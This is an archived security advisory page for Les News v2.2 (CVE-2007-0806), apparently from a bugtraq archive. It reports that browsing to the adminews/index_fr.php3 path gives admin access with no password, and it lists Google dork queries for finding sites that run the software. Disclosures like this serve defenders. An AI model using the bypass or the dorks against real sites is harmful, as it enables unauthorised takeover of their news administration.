Bug: Les News v2.2 [Admin news without password] ( Ascii Version )

Search:
WLB2

Les News v2.2 [Admin news without password]

Published
Credit
Risk
2007.02.12
sn0oPy
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0806
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

* Les News v2.2 [Admin news without password]

* By : sn0oPy

* Risk : verry high

* site : http://stombi.free.fr/

* exploit :

add to the /lesnews/ rep adminews/index_fr.php3

exemple :

http://www.test.ma/lesnews/lesnews_fr.php3
http://www.test.ma/lesnews/adminews/index_fr.php3

Dork :

inurl:"/lesnews/lesnews_fr.php3"
inurl:"/lesnews/lesnews_en.php3"
inurl:"/lesnews/lesnews_de.php3"
inurl:"/lesnews/lesnews_it.php3"

* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]

* greetz : [subzero], http://forums.avenir-geopolitique.net.

reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2622

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version